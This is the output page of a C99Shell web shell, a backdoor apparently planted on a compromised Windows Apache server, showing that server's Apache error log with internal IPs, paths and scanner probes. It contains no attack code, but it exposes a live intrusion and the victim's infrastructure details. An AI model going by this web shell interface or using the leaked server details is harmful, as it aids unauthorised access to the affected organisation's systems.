!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.34 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2016.07.18.log (31.97 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Mon Jul 18 00:47:56.513416 2016] [proxy:error] [pid 6440:tid 15408] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jul 18 00:47:56.513416 2016] [proxy:error] [pid 6440:tid 15408] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jul 18 00:47:56.513416 2016] [proxy_http:error] [pid 6440:tid 15408] [client 66.249.64.165:41513] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jul 18 00:52:12.073065 2016] [core:error] [pid 6440:tid 15856] (20024)The given path is misformatted or contained invalid characters: [client 54.215.237.250:34210] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jul 18 01:35:53.830270 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 02:50:27.638328 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 03:06:09.334982 2016] [core:error] [pid 6440:tid 14580] (20024)The given path is misformatted or contained invalid characters: [client 54.215.225.94:32999] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jul 18 03:32:45.982186 2016] [core:error] [pid 6440:tid 16148] (20024)The given path is misformatted or contained invalid characters: [client 52.38.67.144:36610] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jul 18 03:58:59.245950 2016] [access_compat:error] [pid 6440:tid 15856] [client 52.178.218.220:34307] AH01797: client denied by server configuration: E:/nuevo/htdocs/phpMyAdmin
[Mon Jul 18 03:58:59.667150 2016] [access_compat:error] [pid 6440:tid 15228] [client 52.178.218.220:34532] AH01797: client denied by server configuration: E:/nuevo/phpMyAdmin/scripts
[Mon Jul 18 04:28:17.649838 2016] [core:error] [pid 6440:tid 14580] (20024)The given path is misformatted or contained invalid characters: [client 54.193.91.116:58753] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jul 18 05:18:00.485277 2016] [core:error] [pid 6440:tid 14984] (20024)The given path is misformatted or contained invalid characters: [client 54.193.67.173:32841] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jul 18 05:45:32.123578 2016] [core:error] [pid 6440:tid 15408] (20024)The given path is misformatted or contained invalid characters: [client 54.193.56.122:58025] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jul 18 05:46:08.019241 2016] [core:error] [pid 6440:tid 16136] [client 169.229.3.91:47920] AH00135: Invalid method in request \xfbb=\xc5\x04\x9d\xc2:\xc5z\x8a\xf7w\x91\xd0\xaf\xc1\xdf\xe3\x81h2\xf8s\x7f\xe1>\xbd\xe7^1*4S\xd2X,\xb7\xec\xdd\x05\xd8\x19\xf4\xf3:r}\x8e\x8a9B\xcf3(\xde\xec$\xc9D\x91\x9d
[Mon Jul 18 06:15:22.257922 2016] [proxy:error] [pid 6440:tid 16196] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jul 18 06:15:22.257922 2016] [proxy:error] [pid 6440:tid 16196] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jul 18 06:15:22.257922 2016] [proxy_http:error] [pid 6440:tid 16196] [client 152.61.128.50:39882] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jul 18 06:15:22.476323 2016] [proxy:error] [pid 6440:tid 16196] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jul 18 06:15:22.710323 2016] [proxy:error] [pid 6440:tid 16196] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jul 18 06:16:04.377996 2016] [proxy:error] [pid 6440:tid 16196] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jul 18 06:16:04.611997 2016] [proxy:error] [pid 6440:tid 16196] AH00940: HTTP: disabled connection for (172.22.1.51)
[Mon Jul 18 06:42:31.385384 2016] [proxy:error] [pid 6440:tid 15856] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Mon Jul 18 06:42:31.385384 2016] [proxy:error] [pid 6440:tid 15856] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Mon Jul 18 06:42:31.385384 2016] [proxy_http:error] [pid 6440:tid 15856] [client 66.249.64.165:34906] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Mon Jul 18 07:03:30.447995 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 07:57:03.976640 2016] [proxy_http:error] [pid 6440:tid 16032] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:43062] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 07:57:03.976640 2016] [proxy:error] [pid 6440:tid 16032] [client 201.245.192.253:43062] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 08:14:07.010836 2016] [core:error] [pid 6440:tid 15116] (20024)The given path is misformatted or contained invalid characters: [client 66.249.83.243:52358] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://www.ambientebogota.gov.co/
[Mon Jul 18 08:17:28.375990 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 08:22:18.521900 2016] [proxy_http:error] [pid 6440:tid 16160] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:46216] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 08:22:18.521900 2016] [proxy:error] [pid 6440:tid 16160] [client 201.245.192.253:46216] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 08:22:21.064704 2016] [proxy_http:error] [pid 6440:tid 15968] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:46217] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 08:22:21.064704 2016] [proxy:error] [pid 6440:tid 15968] [client 201.245.192.253:46217] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 08:22:23.513909 2016] [proxy_http:error] [pid 6440:tid 14928] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:46267] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Jul 18 08:22:23.513909 2016] [proxy:error] [pid 6440:tid 14928] [client 201.245.192.253:46267] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Jul 18 08:22:25.729112 2016] [proxy_http:error] [pid 6440:tid 14604] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:46215] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=ListadoMaestroDocumentos3.asp
[Mon Jul 18 08:28:53.093393 2016] [cgi:error] [pid 6440:tid 16072] [client 192.3.106.42:37604] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Mon Jul 18 08:28:53.795394 2016] [cgi:error] [pid 6440:tid 16072] [client 192.3.106.42:37733] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Mon Jul 18 08:44:20.281021 2016] [proxy_http:error] [pid 6440:tid 15404] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:38478] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 09:17:25.884709 2016] [proxy_http:error] [pid 6440:tid 14756] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:39421] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetArticulo.asp?Pagina=/IsolucionSDA/BancoConocimiento/S/Solicituddetrasladooreintegrodeelementos_v2/Solicituddetrasladooreintegrodeelementos_v2.asp?IdArticulo=943
[Mon Jul 18 09:17:25.884709 2016] [proxy:error] [pid 6440:tid 14756] [client 201.245.192.253:39421] AH00898: Error reading from remote server returned by /IsolucionSDA/BancoConocimiento/S/Solicituddetrasladooreintegrodeelementos_v2/Solicituddetrasladooreintegrodeelementos_v2.asp, referer: http://190.27.245.106/isolucionsda/FrameSetArticulo.asp?Pagina=/IsolucionSDA/BancoConocimiento/S/Solicituddetrasladooreintegrodeelementos_v2/Solicituddetrasladooreintegrodeelementos_v2.asp?IdArticulo=943
[Mon Jul 18 09:18:16.350798 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 09:18:36.209632 2016] [cgi:error] [pid 6440:tid 16328] [client 192.3.106.42:48328] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Mon Jul 18 10:10:32.174705 2016] [proxy_http:error] [pid 6440:tid 15856] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:52966] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 10:10:32.174705 2016] [proxy:error] [pid 6440:tid 15856] [client 201.245.192.253:52966] AH00898: Error reading from remote server returned by /isolucionsda/g/Bot_Home.jpg, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 10:14:12.338892 2016] [core:error] [pid 6440:tid 14984] (20024)The given path is misformatted or contained invalid characters: [client 207.46.13.17:14877] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jul 18 10:16:15.251508 2016] [negotiation:error] [pid 6440:tid 15544] [client 190.144.162.82:47943] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Mon Jul 18 10:16:15.594709 2016] [negotiation:error] [pid 6440:tid 15544] [client 190.144.162.82:48065] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Mon Jul 18 10:16:16.655510 2016] [negotiation:error] [pid 6440:tid 15544] [client 190.144.162.82:48097] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Mon Jul 18 10:16:17.045511 2016] [negotiation:error] [pid 6440:tid 15544] [client 190.144.162.82:48158] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Mon Jul 18 10:22:28.622564 2016] [proxy_http:error] [pid 6440:tid 14916] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:49812] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FramesetArticulo.asp?Pagina=bancoconocimiento%2F2%2F223%5FSCAAVTRD%2F223%5FSCAAVTRD%2Easp&IdArticulo=9249&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Mon Jul 18 10:22:28.622564 2016] [proxy:error] [pid 6440:tid 14916] [client 201.245.192.253:49812] AH00898: Error reading from remote server returned by /IsolucionSDA/bancoconocimiento/2/223_SCAAVTRD/223_SCAAVTRD.asp, referer: http://190.27.245.106/IsolucionSDA/FramesetArticulo.asp?Pagina=bancoconocimiento%2F2%2F223%5FSCAAVTRD%2F223%5FSCAAVTRD%2Easp&IdArticulo=9249&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Mon Jul 18 10:35:53.365577 2016] [proxy_http:error] [pid 6440:tid 16328] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:44503] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 10:49:35.284221 2016] [proxy_http:error] [pid 6440:tid 15228] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:49191] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 11:41:13.076262 2016] [proxy_http:error] [pid 6440:tid 15244] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19054] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Jul 18 11:41:13.076262 2016] [proxy:error] [pid 6440:tid 15244] [client 201.245.192.253:19054] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Mon Jul 18 11:43:47.032932 2016] [proxy_http:error] [pid 6440:tid 16328] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:20294] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=8724
[Mon Jul 18 11:43:47.032932 2016] [proxy:error] [pid 6440:tid 16328] [client 201.245.192.253:20294] AH00898: Error reading from remote server returned by /isolucionsda/g/Img_TitEdicion.gif, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=8724
[Mon Jul 18 11:43:47.079732 2016] [proxy_http:error] [pid 6440:tid 15012] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:20295] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=8724
[Mon Jul 18 11:43:47.079732 2016] [proxy:error] [pid 6440:tid 15012] [client 201.245.192.253:20295] AH00898: Error reading from remote server returned by /isolucionsda/g/Img_Lado02H.gif, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=8724
[Mon Jul 18 11:51:31.305348 2016] [proxy_http:error] [pid 6440:tid 16000] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56206] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 11:51:31.305348 2016] [proxy:error] [pid 6440:tid 16000] [client 201.245.192.253:56206] AH00898: Error reading from remote server returned by /isolucionsda/g/Bot_Ayuda.jpg, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 11:51:31.320948 2016] [proxy_http:error] [pid 6440:tid 15064] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56146] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 11:51:31.320948 2016] [proxy_http:error] [pid 6440:tid 15952] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56203] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 11:51:31.320948 2016] [proxy:error] [pid 6440:tid 15952] [client 201.245.192.253:56203] AH00898: Error reading from remote server returned by /isolucionsda/g/Bot_Siguiente.jpg, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 12:36:52.684328 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 12:49:48.848091 2016] [core:error] [pid 6440:tid 16000] (20024)The given path is misformatted or contained invalid characters: [client 1.237.177.12:33563] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://ambientebogota.gov.co
[Mon Jul 18 13:13:29.746387 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 14:25:59.487427 2016] [proxy_http:error] [pid 6440:tid 15512] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:38224] AH01102: error reading status line from remote server 172.22.1.31:80
[Mon Jul 18 14:25:59.487427 2016] [proxy:error] [pid 6440:tid 15512] [client 201.245.192.253:38224] AH00898: Error reading from remote server returned by /isolucionsda/
[Mon Jul 18 14:31:43.468031 2016] [proxy_http:error] [pid 6440:tid 14984] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:44296] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 14:31:43.468031 2016] [proxy:error] [pid 6440:tid 14984] [client 201.245.192.253:44296] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 14:31:43.468031 2016] [proxy_http:error] [pid 6440:tid 14868] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:44297] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 14:31:43.468031 2016] [proxy:error] [pid 6440:tid 14868] [client 201.245.192.253:44297] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 14:34:45.567151 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 14:42:05.456723 2016] [proxy_http:error] [pid 6440:tid 15512] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:49817] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FramesetArticulo.asp?Pagina=bancoconocimiento%2FR%2FResolucion2666de2015%2FResolucion2666de2015%2Easp&IdArticulo=9487&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Mon Jul 18 14:42:05.456723 2016] [proxy:error] [pid 6440:tid 15512] [client 201.245.192.253:49817] AH00898: Error reading from remote server returned by /isolucionsda/bancoconocimiento/R/Resolucion2666de2015/manual de funciones 02666 20150.pdf, referer: http://190.27.245.106/isolucionsda/FramesetArticulo.asp?Pagina=bancoconocimiento%2FR%2FResolucion2666de2015%2FResolucion2666de2015%2Easp&IdArticulo=9487&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Mon Jul 18 14:42:19.574748 2016] [proxy_http:error] [pid 6440:tid 14840] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:49816] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=BancoConocimiento/M/MECINuevo/MECINuevo.asp&IdModulo=16
[Mon Jul 18 14:44:18.353357 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 14:44:18.353357 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 14:47:52.511533 2016] [proxy_http:error] [pid 6440:tid 14628] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:54666] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FramesetArticulo.asp?Pagina=bancoconocimiento%2F2%2F223%5FSCAAVTRD%2F223%5FSCAAVTRD%2Easp&IdArticulo=9249&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Mon Jul 18 14:47:52.511533 2016] [proxy:error] [pid 6440:tid 14628] [client 201.245.192.253:54666] AH00898: Error reading from remote server returned by /IsolucionSDA/bancoconocimiento/2/223_SCAAVTRD/223_SCAAVTRD.asp, referer: http://190.27.245.106/IsolucionSDA/FramesetArticulo.asp?Pagina=bancoconocimiento%2F2%2F223%5FSCAAVTRD%2F223%5FSCAAVTRD%2Easp&IdArticulo=9249&Codigo=&Fecha=&Version=&Procedimiento=&cliente=
[Mon Jul 18 15:12:27.821724 2016] [proxy_http:error] [pid 6440:tid 16164] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:53050] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 15:12:27.821724 2016] [proxy:error] [pid 6440:tid 16164] [client 201.245.192.253:53050] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraTitulos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 15:12:29.802928 2016] [proxy_http:error] [pid 6440:tid 15836] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:53079] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=BancoConocimiento/M/MECINuevo/MECINuevo.asp&IdModulo=16
[Mon Jul 18 15:12:29.802928 2016] [proxy:error] [pid 6440:tid 15836] [client 201.245.192.253:53079] AH00898: Error reading from remote server returned by /IsolucionSDA/BancoConocimiento/M/MECINuevo/MECINuevo.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=BancoConocimiento/M/MECINuevo/MECINuevo.asp&IdModulo=16
[Mon Jul 18 15:37:52.818003 2016] [proxy_http:error] [pid 6440:tid 16032] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:15064] AH01102: error reading status line from remote server 172.22.1.31:80
[Mon Jul 18 15:37:52.818003 2016] [proxy:error] [pid 6440:tid 16032] [client 201.245.192.253:15064] AH00898: Error reading from remote server returned by /IsolucionSDA/ListadoMaestroDocumentos3.asp
[Mon Jul 18 15:53:53.468690 2016] [mpm_winnt:warn] [pid 6440:tid 17816] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Mon Jul 18 16:49:08.740713 2016] [core:error] [pid 6440:tid 15636] (20024)The given path is misformatted or contained invalid characters: [client 52.41.2.247:59002] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Mon Jul 18 17:02:16.339296 2016] [proxy_http:error] [pid 6440:tid 14820] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56966] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:02:16.339296 2016] [proxy:error] [pid 6440:tid 14820] [client 201.245.192.253:56966] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:02:16.354896 2016] [proxy_http:error] [pid 6440:tid 15496] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:56965] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:02:16.354896 2016] [proxy:error] [pid 6440:tid 15496] [client 201.245.192.253:56965] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:18:26.193000 2016] [proxy_http:error] [pid 6440:tid 14772] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:38867] AH01102: error reading status line from remote server 172.22.1.31:80
[Mon Jul 18 17:18:26.193000 2016] [proxy:error] [pid 6440:tid 14772] [client 201.245.192.253:38867] AH00898: Error reading from remote server returned by /isolucionsda/Session.asp
[Mon Jul 18 17:21:51.146160 2016] [proxy_http:error] [pid 6440:tid 15600] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10342] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:21:51.146160 2016] [proxy:error] [pid 6440:tid 15600] [client 201.245.192.253:10342] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:21:51.177360 2016] [proxy_http:error] [pid 6440:tid 16188] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10314] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Mon Jul 18 17:47:41.696283 2016] [proxy_http:error] [pid 6440:tid 14628] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:15202] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:47:41.696283 2016] [proxy:error] [pid 6440:tid 14628] [client 201.245.192.253:15202] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:47:41.711883 2016] [proxy_http:error] [pid 6440:tid 14772] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:15200] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:47:41.711883 2016] [proxy:error] [pid 6440:tid 14772] [client 201.245.192.253:15200] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:47:41.711883 2016] [proxy_http:error] [pid 6440:tid 15464] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:15199] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Mon Jul 18 17:47:41.711883 2016] [proxy:error] [pid 6440:tid 15464] [client 201.245.192.253:15199] AH00898: Error reading from remote server returned by /isolucionsda/BarraTitulos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
